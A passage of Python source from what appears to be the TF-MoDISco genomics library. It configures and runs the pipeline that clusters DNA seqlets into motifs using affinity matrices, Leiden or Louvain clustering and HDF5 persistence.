def new_constructor(*args, **kwargs):
gapped_kmer_kwargs = fish_out_kwargs(
orig_kwargs=kwargs,
to_fish_out=['kmer_len', 'num_gaps',
'num_mismatches', 'gpu_batch_size'])
if (len(gapped_kmer_kwargs) > 0):
assert 'embedder_factory' not in kwargs,\
("Cannot both specify embedder_factory and "
+str(gapped_kmer_kwargs))
from modisco.seqlet_embedding import gapped_kmer
kwargs['embedder_factory'] = (
seqlet_embedding.gapped_kmer
.GappedKmerEmbedderFactory(**gapped_kmer_kwargs))
return current_constructor(*args, **kwargs)
return new_constructor
##legacy
#alphabet_size=None,
#kmer_len=None, num_gaps=3, num_mismatches=2,
#gpu_batch_size=20,
class TfModiscoSeqletsToPatternsFactory(object):
@legacy_tfmodiscoseqletstopatternsfactory
def __init__(self, n_cores=4,
min_overlap_while_sliding=0.7,
#init clusterer factory
initclusterer_factory=None,
embedder_factory=(
seqlet_embedding.advanced_gapped_kmer
.AdvancedGappedKmerEmbedderFactory()),
nearest_neighbors_to_compute=500,
affmat_correlation_threshold=0.15,
filter_beyond_first_round=False,
skip_fine_grained=False,
tsne_perplexity=10,
use_louvain=False,
louvain_initclusters_weight=1.0,
n_leiden_iterations_r1=-1,
n_leiden_iterations_r2=-1,
louvain_num_runs_and_levels_r1=[(200,-1)],
louvain_num_runs_and_levels_r2=[(200,-1)],
contin_runs_r1=50,
contin_runs_r2=50,
final_louvain_level_to_return=1,
frac_support_to_trim_to=0.2,
min_num_to_trim_to=30,
trim_to_window_size=30,
initial_flank_to_add=10,
prob_and_pertrack_sim_merge_thresholds=[
(0.8,0.8), (0.5, 0.85), (0.2, 0.9)],
prob_and_pertrack_sim_dealbreaker_thresholds=[
(0.4, 0.75), (0.2,0.8), (0.1, 0.85), (0.0,0.9)],
subcluster_perplexity=50,
merging_max_seqlets_subsample=300,
#threshold_for_spurious_merge_detection=0.8,
#min_similarity_for_seqlet_assignment=0.2,
final_min_cluster_size=30,
min_ic_in_window=0.6,#total IC in some windowsize window
min_ic_windowsize=6,
ppm_pseudocount=0.001,
final_flank_to_add=0,
verbose=True, seed=1234):
self.initclusterer_factory = initclusterer_factory
if (use_louvain==True):
assert self.initclusterer_factory==None,\
("Louvain doesn't support cluster initialization;"
+" set use_louvain to False")
#affinity_mat calculation
self.n_cores = n_cores
self.min_overlap_while_sliding = min_overlap_while_sliding
self.embedder_factory = embedder_factory
self.nearest_neighbors_to_compute = nearest_neighbors_to_compute
self.affmat_correlation_threshold = affmat_correlation_threshold
self.filter_beyond_first_round = filter_beyond_first_round
self.skip_fine_grained = skip_fine_grained
#affinity mat to tsne dist mat setting
self.tsne_perplexity = tsne_perplexity
#clustering settings
self.use_louvain = use_louvain
self.louvain_initclusters_weight = louvain_initclusters_weight
self.n_leiden_iterations_r1 = n_leiden_iterations_r1
self.n_leiden_iterations_r2 = n_leiden_iterations_r2
self.contin_runs_r1 = contin_runs_r1
self.contin_runs_r2 = contin_runs_r2
self.louvain_num_runs_and_levels_r1 = louvain_num_runs_and_levels_r1
self.louvain_num_runs_and_levels_r2 = louvain_num_runs_and_levels_r2
self.final_louvain_level_to_return = final_louvain_level_to_return
#postprocessor1 settings
self.frac_support_to_trim_to = frac_support_to_trim_to
self.min_num_to_trim_to = min_num_to_trim_to
self.trim_to_window_size = trim_to_window_size
self.initial_flank_to_add = initial_flank_to_add
#subclustering
self.subcluster_perplexity=subcluster_perplexity
#merging similar patterns
self.prob_and_pertrack_sim_merge_thresholds =\
prob_and_pertrack_sim_merge_thresholds
self.prob_and_pertrack_sim_dealbreaker_thresholds =\
prob_and_pertrack_sim_dealbreaker_thresholds
self.merging_max_seqlets_subsample = merging_max_seqlets_subsample
#self.threshold_for_spurious_merge_detection =\
# threshold_for_spurious_merge_detection
#reassignment settings
#self.min_similarity_for_seqlet_assignment =\
# min_similarity_for_seqlet_assignment
self.final_min_cluster_size = final_min_cluster_size
self.min_ic_in_window = min_ic_in_window
self.min_ic_windowsize = min_ic_windowsize
self.ppm_pseudocount = ppm_pseudocount
#final postprocessor settings
self.final_flank_to_add=final_flank_to_add
#other settings
self.verbose = verbose
self.seed = seed
def get_jsonable_config(self):
to_return = OrderedDict([
('class_name', type(self).__name__),
('n_cores', self.n_cores),
('initclusterer_factory',
self.initclusterer_factory.get_jsonable_config()),
('min_overlap_while_sliding', self.min_overlap_while_sliding),
('embedder_factory',
self.embedder_factory.get_jsonable_config()),
('num_mismatches', self.num_mismatches),
('nearest_neighbors_to_compute',
self.nearest_neighbors_to_compute),
('affmat_correlation_threshold',
self.affmat_correlation_threshold),
('filter_beyond_first_round', filter_beyond_first_round),
('tsne_perplexity', self.tsne_perplexity),
('use_louvain', self.use_louvain),
('louvain_num_runs_and_levels_r1',
self.louvain_num_runs_and_levels_r1),
('louvain_num_runs_and_levels_r2',
self.louvain_num_runs_and_levels_r2),
('final_louvain_level_to_return',
self.final_louvain_level_to_return),
('contin_runs_r1',
self.contin_runs_r1),
('contin_runs_r2',
self.contin_runs_r2),
('frac_support_to_trim_to', self.frac_support_to_trim_to),
('min_num_to_trim_to', self.min_num_to_trim_to),
('trim_to_window_size', self.trim_to_window_size),
('initial_flank_to_add', self.initial_flank_to_add),
('subcluster_perplexity', self.subcluster_perplexity),
('prob_and_pertrack_sim_merge_thresholds',
self.prob_and_pertrack_sim_merge_thresholds),
('prob_and_pertrack_sim_dealbreaker_thresholds',
self.prob_and_pertrack_sim_dealbreaker_thresholds),
('merging_max_seqlets_subsample',
self.merging_max_seqlets_subsample),
#('threshold_for_spurious_merge_detection',
# self.threshold_for_spurious_merge_detection),
('min_similarity_for_seqlet_assignment',
self.min_similarity_for_seqlet_assignment),
('final_min_cluster_size', self.final_min_cluster_size),
('min_ic_in_window', self.min_ic_in_window),
('min_ic_windowsize', self.min_ic_windowsize),
('ppm_pseudocount', self.ppm_pseudocount),
('final_flank_to_add', self.final_flank_to_add),
])
return to_return
def __call__(self, track_set, onehot_track_name,
contrib_scores_track_names,
hypothetical_contribs_track_names,
track_signs,
other_comparison_track_names=[]):
bg_freq = np.mean(
track_set.track_name_to_data_track[onehot_track_name].fwd_tracks,
axis=(0,1))
assert len(bg_freq.shape)==1
assert len(track_signs)==len(hypothetical_contribs_track_names)
assert len(track_signs)==len(contrib_scores_track_names)
seqlets_sorter = (lambda arr:
sorted(arr,
key=lambda x:
-np.sum([np.sum(np.abs(x[track_name].fwd))
for track_name
in contrib_scores_track_names])))
if (self.initclusterer_factory is not None):
self.initclusterer_factory.set_onehot_track_name(onehot_track_name)
initclusterer_factory = self.initclusterer_factory
pattern_comparison_settings =\
affinitymat.core.PatternComparisonSettings(
track_names=hypothetical_contribs_track_names
+contrib_scores_track_names
+other_comparison_track_names,
track_transformer=affinitymat.L1Normalizer(),
min_overlap=self.min_overlap_while_sliding)
#coarse_grained 1d embedder
seqlets_to_1d_embedder = self.embedder_factory(
onehot_track_name=onehot_track_name,
toscore_track_names_and_signs=list(
zip(hypothetical_contribs_track_names,
[np.sign(x) for x in track_signs])),
n_jobs=self.n_cores)
#affinity matrix from embeddings
coarse_affmat_computer =\
affinitymat.core.SparseAffmatFromFwdAndRevSeqletEmbeddings(
seqlets_to_1d_embedder=seqlets_to_1d_embedder,
sparse_affmat_from_fwdnrev1dvecs=\
affinitymat.core.SparseNumpyCosineSimFromFwdAndRevOneDVecs(
n_neighbors=self.nearest_neighbors_to_compute,
verbose=self.verbose),
verbose=self.verbose)
affmat_from_seqlets_with_nn_pairs =\
affinitymat.core.AffmatFromSeqletsWithNNpairs(
pattern_comparison_settings=pattern_comparison_settings,
sim_metric_on_nn_pairs=\
affinitymat.core.ParallelCpuCrossMetricOnNNpairs(
n_cores=self.n_cores,
cross_metric_single_region=
affinitymat.core.CrossContinJaccardSingleRegion()))
filter_mask_from_correlation =\
affinitymat.core.FilterMaskFromCorrelation(
correlation_threshold=self.affmat_correlation_threshold,
verbose=self.verbose)
aff_to_dist_mat = affinitymat.transformers.AffToDistViaInvLogistic()
#density_adapted_affmat_transformer =\
# affinitymat.transformers.NNTsneConditionalProbs(
# perplexity=self.tsne_perplexity,
# aff_to_dist_mat=aff_to_dist_mat)
#prepare the clusterers for the different rounds
# No longer a need for symmetrization because am symmetrizing by
# taking the geometric mean elsewhere
affmat_transformer_r1 =\
affinitymat.transformers.AdhocAffMatTransformer(lambda x: x)
#affinitymat.transformers.SymmetrizeByAddition(
# probability_normalize=True)
print("TfModiscoSeqletsToPatternsFactory: seed=%d" % self.seed)
if (self.use_louvain):
for n_runs, level_to_return in self.louvain_num_runs_and_levels_r1:
affmat_transformer_r1 = affmat_transformer_r1.chain(
affinitymat.transformers.LouvainMembershipAverage(
n_runs=n_runs,
level_to_return=level_to_return,
parallel_threads=self.n_cores, seed=self.seed))
clusterer_r1 = cluster.core.LouvainCluster(
level_to_return=self.final_louvain_level_to_return,
affmat_transformer=affmat_transformer_r1,
contin_runs=self.contin_runs_r1,
verbose=self.verbose, seed=self.seed)
else:
clusterer_r1 = cluster.core.LeidenClusterParallel(
n_jobs=self.n_cores,
affmat_transformer=affmat_transformer_r1,
numseedstotry=self.contin_runs_r1,
n_leiden_iterations=self.n_leiden_iterations_r1,
verbose=self.verbose)
#No longer a need for symmetrization because am symmetrizing by
# taking the geometric mean elsewhere
affmat_transformer_r2 =\
affinitymat.transformers.AdhocAffMatTransformer(lambda x: x)
#affmat_transformer_r2 = affinitymat.transformers.SymmetrizeByAddition(
# probability_normalize=True)
if (self.use_louvain):
for n_runs, level_to_return in self.louvain_num_runs_and_levels_r2:
affmat_transformer_r2 = affmat_transformer_r2.chain(
affinitymat.transformers.LouvainMembershipAverage(
n_runs=n_runs,
level_to_return=level_to_return,
parallel_threads=self.n_cores, seed=self.seed))
clusterer_r2 = cluster.core.LouvainCluster(
level_to_return=self.final_louvain_level_to_return,
affmat_transformer=affmat_transformer_r2,
contin_runs=self.contin_runs_r2,
verbose=self.verbose, seed=self.seed,
initclusters_weight=self.louvain_initclusters_weight)
else:
clusterer_r2 = cluster.core.LeidenClusterParallel(
n_jobs=self.n_cores,
affmat_transformer=affmat_transformer_r2,
numseedstotry=self.contin_runs_r2,
n_leiden_iterations=self.n_leiden_iterations_r2,
verbose=self.verbose)
clusterer_per_round = [clusterer_r1, clusterer_r2]
#prepare the seqlet aggregator
expand_trim_expand1 =\
aggregator.ExpandSeqletsToFillPattern(
track_set=track_set,
flank_to_add=self.initial_flank_to_add).chain(
aggregator.TrimToBestWindowByIC(
window_size=self.trim_to_window_size,
onehot_track_name=onehot_track_name,
bg_freq=bg_freq)).chain(
aggregator.ExpandSeqletsToFillPattern(
track_set=track_set,
flank_to_add=self.initial_flank_to_add))
postprocessor1 =\
aggregator.TrimToFracSupport(
min_frac=self.frac_support_to_trim_to,
min_num=self.min_num_to_trim_to,
verbose=self.verbose)\
.chain(expand_trim_expand1)
seqlet_aggregator = aggregator.GreedySeqletAggregator(
pattern_aligner=core.CrossContinJaccardPatternAligner(
pattern_comparison_settings=pattern_comparison_settings),
seqlet_sort_metric=
lambda x: -sum([np.sum(np.abs(x[track_name].fwd)) for
track_name in contrib_scores_track_names]),
track_set=track_set, #needed for seqlet expansion
postprocessor=postprocessor1)
def sign_consistency_func(motif):
motif_track_signs = [
np.sign(np.sum(motif[contrib_scores_track_name].fwd)) for
contrib_scores_track_name in contrib_scores_track_names]
return all([(x==y) for x,y in zip(motif_track_signs, track_signs)])
#prepare the similar patterns collapser
pattern_to_seqlet_sim_computer =\
affinitymat.core.AffmatFromSeqletsWithNNpairs(
pattern_comparison_settings=pattern_comparison_settings,
sim_metric_on_nn_pairs=\
affinitymat.core.ParallelCpuCrossMetricOnNNpairs(
n_cores=self.n_cores,
cross_metric_single_region=\
affinitymat.core.CrossContinJaccardSingleRegion(),
verbose=False))
#similarity settings for merging
prob_and_sim_merge_thresholds =\
self.prob_and_pertrack_sim_merge_thresholds
prob_and_sim_dealbreaker_thresholds =\
self.prob_and_pertrack_sim_dealbreaker_thresholds
similar_patterns_collapser =\
aggregator.DynamicDistanceSimilarPatternsCollapser2(
pattern_comparison_settings=pattern_comparison_settings,
track_set=track_set,
pattern_aligner=core.CrossCorrelationPatternAligner(
pattern_comparison_settings=
affinitymat.core.PatternComparisonSettings(
track_names=(
contrib_scores_track_names+
other_comparison_track_names),
track_transformer=
affinitymat.MeanNormalizer().chain(
affinitymat.MagnitudeNormalizer()),
min_overlap=self.min_overlap_while_sliding)),
collapse_condition=(lambda prob, aligner_sim:
any([(prob >= x[0] and aligner_sim >= x[1])
for x in prob_and_sim_merge_thresholds])),
dealbreaker_condition=(lambda prob, aligner_sim:
any([(prob <= x[0] and aligner_sim <= x[1])
for x in prob_and_sim_dealbreaker_thresholds])),
postprocessor=postprocessor1,
verbose=self.verbose,
max_seqlets_subsample=self.merging_max_seqlets_subsample,
n_cores=self.n_cores)
subcluster_settings = {
"pattern_comparison_settings": pattern_comparison_settings,
"perplexity": self.subcluster_perplexity,
"n_jobs": self.n_cores,
}
spurious_merge_detector = aggregator.DetectSpuriousMerging2(
subcluster_settings=subcluster_settings,
verbose=self.verbose,
min_in_subcluster=max(self.final_min_cluster_size,
self.subcluster_perplexity),
similar_patterns_collapser=similar_patterns_collapser)
#spurious_merge_detector = aggregator.DetectSpuriousMerging(
# track_names=contrib_scores_track_names,
# track_transformer=affinitymat.core.L1Normalizer(),
# affmat_from_1d=affinitymat.core.ContinJaccardSimilarity(
# make_positive=True, verbose=False),
# diclusterer=cluster.core.LouvainCluster(
# level_to_return=1,
# max_clusters=2, contin_runs=20,
# verbose=False, seed=self.seed),
# is_dissimilar_func=aggregator.PearsonCorrIsDissimilarFunc(
# threshold=self.threshold_for_spurious_merge_detection,
# verbose=self.verbose),
# min_in_subcluster=self.final_min_cluster_size)
#similar_patterns_collapser =\
# aggregator.DynamicDistanceSimilarPatternsCollapser(
# pattern_to_pattern_sim_computer=
# pattern_to_seqlet_sim_computer,
# aff_to_dist_mat=aff_to_dist_mat,
# pattern_aligner=core.CrossCorrelationPatternAligner(
# pattern_comparison_settings=
# affinitymat.core.PatternComparisonSettings(
# track_names=(
# contrib_scores_track_names+
# other_comparison_track_names),
# track_transformer=
# affinitymat.MeanNormalizer().chain(
# affinitymat.MagnitudeNormalizer()),
# min_overlap=self.min_overlap_while_sliding)),
# collapse_condition=(lambda prob, aligner_sim:
# any([(prob > x[0] and aligner_sim > x[1])
# for x in prob_and_sim_merge_thresholds])),
# dealbreaker_condition=(lambda prob, aligner_sim:
# any([(prob < x[0] and aligner_sim < x[1])
# for x in prob_and_sim_dealbreaker_thresholds])),
# postprocessor=postprocessor1,
# verbose=self.verbose)
pattern_filterer = pattern_filterer_module.MinSeqletSupportFilterer(
min_seqlet_support=self.final_min_cluster_size).chain(
pattern_filterer_module.MinICinWindow(
window_size=self.min_ic_windowsize,
min_ic_in_window=self.min_ic_in_window,
background=bg_freq,
sequence_track_name=onehot_track_name,
ppm_pseudocount=self.ppm_pseudocount
)
)
#seqlet_reassigner =\
# aggregator.ReassignSeqletsFromSmallClusters(
# seqlet_assigner=aggregator.AssignSeqletsByBestMetric(
# pattern_comparison_settings=pattern_comparison_settings,
# individual_aligner_metric=
# core.get_best_alignment_crosscontinjaccard,
# matrix_affinity_metric=
# affinitymat.core.CrossContinJaccardMultiCoreCPU(
# verbose=self.verbose, n_cores=self.n_cores),
# min_similarity=self.min_similarity_for_seqlet_assignment,
# track_set=track_set),
# min_cluster_size=self.final_min_cluster_size,
# postprocessor=expand_trim_expand1,
# verbose=self.verbose)
final_postprocessor = aggregator.ExpandSeqletsToFillPattern(
track_set=track_set,
flank_to_add=self.final_flank_to_add)
return TfModiscoSeqletsToPatterns(
seqlets_sorter=seqlets_sorter,
initclusterer_factory=initclusterer_factory,
coarse_affmat_computer=coarse_affmat_computer,
nearest_neighbors_to_compute=self.nearest_neighbors_to_compute,
affmat_from_seqlets_with_nn_pairs=
affmat_from_seqlets_with_nn_pairs,
filter_mask_from_correlation=filter_mask_from_correlation,
filter_beyond_first_round=self.filter_beyond_first_round,
skip_fine_grained=self.skip_fine_grained,
aff_to_dist_mat=aff_to_dist_mat,
tsne_perplexity=self.tsne_perplexity,
#density_adapted_affmat_transformer=
# density_adapted_affmat_transformer,
clusterer_per_round=clusterer_per_round,
seqlet_aggregator=seqlet_aggregator,
sign_consistency_func=sign_consistency_func,
subcluster_settings=subcluster_settings,
spurious_merge_detector=spurious_merge_detector,
similar_patterns_collapser=similar_patterns_collapser,
#seqlet_reassigner=seqlet_reassigner,
pattern_filterer=pattern_filterer,
final_postprocessor=final_postprocessor,
verbose=self.verbose,
n_cores=self.n_cores,
other_config={
'onehot_track_name': onehot_track_name,
'contrib_scores_track_names': contrib_scores_track_names,
'hypothetical_contribs_track_names':
hypothetical_contribs_track_names,
'track_signs': track_signs,
'other_comparison_track_names': other_comparison_track_names},
)
def save_hdf5(self, grp):
grp.attrs['jsonable_config'] =\
json.dumps(self.jsonable_config, indent=4, separators=(',', ': '))
class SeqletsToPatternsResults(object):
def __init__(self,
each_round_initcluster_motifs,
patterns,
remaining_patterns,
pattern_merge_hierarchy,
cluster_results,
total_time_taken,
other_config={},
success=True,
**kwargs):
self.each_round_initcluster_motifs = each_round_initcluster_motifs
self.other_config = other_config
self.success = success
self.patterns = patterns
self.remaining_patterns = remaining_patterns
self.pattern_merge_hierarchy = pattern_merge_hierarchy
self.cluster_results = cluster_results
self.total_time_taken = total_time_taken
self.__dict__.update(**kwargs)
def save_each_round_initcluster_motifs(self, grp):
all_round_names = []
for (round_idx,initcluster_motifs)\
in enumerate(self.each_round_initcluster_motifs):
round_name = "round_"+str(round_idx)
util.save_patterns(patterns=initcluster_motifs,
grp=grp.create_group(round_name))
util.save_string_list(
string_list=all_round_names,
dset_name="all_round_names",
grp=grp)
@classmethod
def load_each_round_initcluster_motifs(cls, grp, track_set):
all_round_names = util.load_string_list(dset_name="all_round_names",
grp=grp)
each_round_initcluster_motifs = []
for round_name in all_round_names:
round_grp = grp[round_name]
initcluster_motifs = load_patterns(grp=round_grp,
track_set=track_set)
each_round_initcluster_motifs.append(initcluster_motifs)
return each_round_initcluster_motifs
@classmethod
def from_hdf5(cls, grp, track_set):
success = grp.attrs.get("success", False)
if (success):
if ("each_round_initcluster_motifs" not in grp):
each_round_initcluster_motifs = None
else:
each_round_initcluster_motifs =\
cls.load_each_round_initcluster_motifs(
grp=grp["each_round_initcluster_motifs"],
track_set=track_set)
patterns = util.load_patterns(grp=grp["patterns"],
track_set=track_set)
if "remaining_patterns" in grp:
remaining_patterns = util.load_patterns(
grp=grp["remaining_patterns"],
track_set=track_set)
else: #backwards compatibility
remaining_patterns = []
cluster_results = None
total_time_taken = grp.attrs["total_time_taken"]
if ("pattern_merge_hierarchy" in grp):
pattern_merge_hierarchy =\
aggregator.PatternMergeHierarchy.from_hdf5(
grp=grp["pattern_merge_hierarchy"],
track_set=track_set)
else:
pattern_merge_hierarchy = None
return cls(
each_round_initcluster_motifs=each_round_initcluster_motifs,
patterns=patterns,
remaining_patterns=remaining_patterns,
pattern_merge_hierarchy=pattern_merge_hierarchy,
cluster_results=cluster_results,
total_time_taken=total_time_taken)
else:
return cls(success=False, patterns=None, cluster_results=None,
total_time_taken=None,
each_round_initcluster_motifs=None,
remaining_patterns=None,
pattern_merge_hierarchy=None)
def save_hdf5(self, grp):
grp.attrs["success"] = self.success
grp.attrs["other_config"] =\
json.dumps(self.other_config, indent=4, separators=(',', ': '))
if (self.success):
grp.attrs["total_time_taken"] = self.total_time_taken
if (self.each_round_initcluster_motifs is not None):
self.save_each_round_initcluster_motifs(
grp=grp.create_group("each_round_initcluster_motifs"))
util.save_patterns(self.patterns,
grp.create_group("patterns"))
util.save_patterns(
self.remaining_patterns,
grp.create_group("remaining_patterns"))
self.cluster_results.save_hdf5(grp.create_group("cluster_results"))
grp.attrs['total_time_taken'] = self.total_time_taken
self.pattern_merge_hierarchy.save_hdf5(
grp=grp.create_group("pattern_merge_hierarchy"))
class AbstractSeqletsToPatterns(object):
def __call__(self, seqlets):
raise NotImplementedError()
class TfModiscoSeqletsToPatterns(AbstractSeqletsToPatterns):
def __init__(self, seqlets_sorter,
initclusterer_factory,
coarse_affmat_computer,
nearest_neighbors_to_compute,
affmat_from_seqlets_with_nn_pairs,
filter_mask_from_correlation,
filter_beyond_first_round,
skip_fine_grained,
aff_to_dist_mat,
tsne_perplexity,
#density_adapted_affmat_transformer,
clusterer_per_round,
seqlet_aggregator,
sign_consistency_func,
spurious_merge_detector,
similar_patterns_collapser,
pattern_filterer,
#seqlet_reassigner,
final_postprocessor,
subcluster_settings,
n_cores,
other_config={},
verbose=True):
self.seqlets_sorter = seqlets_sorter
self.initclusterer_factory = initclusterer_factory
self.coarse_affmat_computer = coarse_affmat_computer
self.nearest_neighbors_to_compute = nearest_neighbors_to_compute
self.affmat_from_seqlets_with_nn_pairs =\
affmat_from_seqlets_with_nn_pairs
self.filter_mask_from_correlation = filter_mask_from_correlation
self.filter_beyond_first_round = filter_beyond_first_round
self.skip_fine_grained = skip_fine_grained
self.aff_to_dist_mat = aff_to_dist_mat
self.tsne_perplexity = tsne_perplexity
#self.density_adapted_affmat_transformer =\
# density_adapted_affmat_transformer
self.clusterer_per_round = clusterer_per_round
self.seqlet_aggregator = seqlet_aggregator
self.sign_consistency_func = sign_consistency_func
self.spurious_merge_detector = spurious_merge_detector
self.similar_patterns_collapser = similar_patterns_collapser
#self.seqlet_reassigner = seqlet_reassigner
self.pattern_filterer = pattern_filterer
self.final_postprocessor = final_postprocessor
self.verbose = verbose
self.subcluster_settings = subcluster_settings
self.n_cores = n_cores
self.other_config = other_config
def get_cluster_to_aggregate_motif(self, seqlets, cluster_indices,
sign_consistency_check,
min_seqlets_in_motif):
num_clusters = max(cluster_indices+1)
cluster_to_seqlets = defaultdict(list)
assert len(seqlets)==len(cluster_indices)
for seqlet,idx in zip(seqlets, cluster_indices):
cluster_to_seqlets[idx].append(seqlet)
cluster_to_motif = OrderedDict()
cluster_to_eliminated_motif = OrderedDict()
for i in range(num_clusters):
if (len(cluster_to_seqlets[i]) >= min_seqlets_in_motif):
if (self.verbose):
print("Aggregating for cluster "+str(i)+" with "
+str(len(cluster_to_seqlets[i]))+" seqlets")
print_memory_use()
sys.stdout.flush()
motifs = self.seqlet_aggregator(cluster_to_seqlets[i])
assert len(motifs)<=1
if (len(motifs) > 0):
motif = motifs[0]
if (sign_consistency_check==False or
self.sign_consistency_func(motif)):
cluster_to_motif[i] = motif
else:
if (self.verbose):
print("Dropping cluster "+str(i)+
" with "+str(motif.num_seqlets)
+" seqlets due to sign disagreement")
cluster_to_eliminated_motif[i] = motif
return cluster_to_motif, cluster_to_eliminated_motif
def do_density_adaptation(self, new_rows_distmat_nn, new_rows_nn,
new_rows_betas, new_rows_normfactors):
new_rows_densadapted_affmat_nn = []
for i in range(len(new_rows_distmat_nn)):
densadapted_row = []
for j,distance in zip(new_rows_nn[i], new_rows_distmat_nn[i]):
densadapted_row.append(np.sqrt(
(np.exp(-distance/new_rows_betas[i])/new_rows_normfactors[i])
*(np.exp(-distance/new_rows_betas[j])/
new_rows_normfactors[j])))
new_rows_densadapted_affmat_nn.append(densadapted_row)
return new_rows_densadapted_affmat_nn
def __call__(self, seqlets):
seqlets = self.seqlets_sorter(seqlets)
if (self.initclusterer_factory is not None):
initclusterer = self.initclusterer_factory(seqlets=seqlets)
else:
initclusterer = None
start = time.time()
#seqlets_sets = []
#coarse_affmats = []
#nn_affmats = []
#filtered_seqlets_sets = []
#filtered_affmats = []
#density_adapted_affmats = []
#cluster_results_sets = []
#cluster_to_motif_sets = []
#cluster_to_eliminated_motif_sets = []
if (initclusterer is not None):
each_round_initcluster_motifs = []
else:
each_round_initcluster_motifs = None
for round_idx, clusterer in enumerate(self.clusterer_per_round):
import gc
gc.collect()
round_num = round_idx+1
if (initclusterer is not None):
initclusters = initclusterer(seqlets=seqlets)
initcluster_motifs =\
list(self.get_cluster_to_aggregate_motif(
seqlets=seqlets,
cluster_indices=initclusters,
sign_consistency_check=False,
min_seqlets_in_motif=2)[0].values())
each_round_initcluster_motifs.append(initcluster_motifs)
else:
initclusters = None
initcluster_motifs = None
if (len(seqlets)==0):
if (self.verbose):
print("len(seqlets) is 0 - bailing!")
return SeqletsToPatternsResults(
each_round_initcluster_motifs=None,
patterns=None,
remaining_patterns=None,
pattern_merge_hierarchy=None,
cluster_results=None,
total_time_taken=None,
success=False,
seqlets=None,
affmat=None)
if (self.verbose):
print("(Round "+str(round_num)+
") num seqlets: "+str(len(seqlets)))
print("(Round "+str(round_num)+") Computing coarse affmat")
print_memory_use()
sys.stdout.flush()
#coarse_affmat = self.coarse_affmat_computer(seqlets)
#coarse_affmats.append(coarse_affmat)
coarse_affmat_nn, seqlet_neighbors =\
self.coarse_affmat_computer(seqlets, initclusters=initclusters)
gc.collect()
if (self.verbose):
print("(Round "+str(round_num)+") Computed coarse affmat")
print_memory_use()
sys.stdout.flush()
if (self.skip_fine_grained==False):
#nn_start = time.time()
#if (self.verbose):
# print("(Round "+str(round_num)+") Compute nearest neighbors"
# +" from coarse affmat")
# print_memory_use()
# sys.stdout.flush()
#seqlet_neighbors = get_seqlet_neighbors_with_initcluster(
# nearest_neighbors_to_compute=
# self.nearest_neighbors_to_compute,
# coarse_affmat=coarse_affmat,
# initclusters=initclusters)
#if (self.verbose):
# print("Computed nearest neighbors in",
# round(time.time()-nn_start,2),"s")
# print_memory_use()
# sys.stdout.flush()
nn_affmat_start = time.time()
if (self.verbose):
print("(Round "+str(round_num)+") Computing affinity matrix"
+" on nearest neighbors")
print_memory_use()
sys.stdout.flush()
#nn_affmat = self.affmat_from_seqlets_with_nn_pairs(
# seqlet_neighbors=seqlet_neighbors,
# seqlets=seqlets)
#nn_affmats.append(nn_affmat)
fine_affmat_nn = self.affmat_from_seqlets_with_nn_pairs(
seqlet_neighbors=seqlet_neighbors,
seqlets=seqlets,
return_sparse=True)
#get the fine_affmat_nn reorderings
reorderings = np.array([np.argsort(-finesimsinrow)
for finesimsinrow in fine_affmat_nn])
#reorder fine_affmat_nn, coarse_affmat_nn and seqlet_neighbors
# according to reorderings
fine_affmat_nn = [finesimsinrow[rowreordering]
for (finesimsinrow, rowreordering)
in zip(fine_affmat_nn, reorderings)]
coarse_affmat_nn = [coarsesimsinrow[rowreordering]
for (coarsesimsinrow, rowreordering)
in zip(coarse_affmat_nn, reorderings)]
seqlet_neighbors = [nnrow[rowreordering]
for (nnrow, rowreordering)
in zip(seqlet_neighbors, reorderings)]
del reorderings
gc.collect()
if (self.verbose):
print("(Round "+str(round_num)+") Computed affinity matrix"
+" on nearest neighbors in",
round(time.time()-nn_affmat_start,2),"s")
print_memory_use()
sys.stdout.flush()
#filter by correlation
if (round_idx == 0 or self.filter_beyond_first_round==True):
#the filter_mask_from_correlation function only operates
# on columns in which np.abs(main_affmat) > 0
#filtered_rows_mask = self.filter_mask_from_correlation(
# main_affmat=nn_affmat,
# other_affmat=coarse_affmat)
filtered_rows_mask = self.filter_mask_from_correlation(
main_affmat=fine_affmat_nn,
other_affmat=coarse_affmat_nn)
if (self.verbose):
print("(Round "+str(round_num)+") Retained "
+str(np.sum(filtered_rows_mask))
+" rows out of "+str(len(filtered_rows_mask))
+" after filtering")
print_memory_use()
sys.stdout.flush()
else:
filtered_rows_mask = np.array([True for x in seqlets])
if (self.verbose):
print("Not applying filtering for "
+"rounds above first round")
print_memory_use()
sys.stdout.flush()
del coarse_affmat_nn
gc.collect()
filtered_seqlets = [x[0] for x in
zip(seqlets, filtered_rows_mask) if (x[1])]
if (initclusters is not None):
filtered_initclusters = initclusters[filtered_rows_mask]
else:
filtered_initclusters = None
#filtered_seqlets_sets.append(filtered_seqlets)
#filtered_affmat =\
# nn_affmat[filtered_rows_mask][:,filtered_rows_mask]
#del coarse_affmat
#del nn_affmat
#figure out a mapping from pre-filtering to the
# post-filtering indices
new_idx_mapping = (
np.cumsum(1.0*(filtered_rows_mask)).astype("int")-1)
retained_indices = set(np.arange(len(filtered_rows_mask))[
filtered_rows_mask])
del filtered_rows_mask
filtered_neighbors = []
filtered_affmat_nn = []
for old_row_idx, (old_neighbors,affmat_row) in enumerate(
zip(seqlet_neighbors, fine_affmat_nn)):
if old_row_idx in retained_indices:
filtered_old_neighbors = [
neighbor for neighbor in old_neighbors if neighbor
in retained_indices]
filtered_affmat_row = [
affmatval for affmatval,neighbor
in zip(affmat_row,old_neighbors)
if neighbor in retained_indices]
filtered_neighbors_row = [
new_idx_mapping[neighbor] for neighbor
in filtered_old_neighbors]
filtered_neighbors.append(filtered_neighbors_row)
filtered_affmat_nn.append(filtered_affmat_row)
#overwrite seqlet_neighbors...should be ok if the rows are
# not all the same length
seqlet_neighbors = filtered_neighbors
del (filtered_neighbors, retained_indices, new_idx_mapping)
else:
filtered_affmat = coarse_affmat_nn
filtered_seqlets = seqlets
if (initclusters is not None):
filtered_initclusters = initclusters
else:
filtered_initclusters = None
if (self.verbose):
print("(Round "+str(round_num)+") Computing density "
+"adapted affmat")
print_memory_use()
sys.stdout.flush()
#density_adapted_affmat =\
# self.density_adapted_affmat_transformer(filtered_affmat)
#del filtered_affmat
#density_adapted_affmats.append(density_adapted_affmat)
#apply aff_to_dist_mat one row at a time
distmat_nn = [self.aff_to_dist_mat(affinity_mat=x)
for x in filtered_affmat_nn]
del filtered_affmat_nn
if (self.verbose):
print("Symmetrizing nearest neighbors")
#Note: the fine-grained similarity metric isn't actually symmetric
# because a different input will get padded with zeros depending
# on which seqlets are specified as the filters and which seqlets
# are specified as the 'thing to scan'. So explicit symmetrization
# is worthwhile
sym_seqlet_neighbors, sym_distmat_nn = util.symmetrize_nn_distmat(
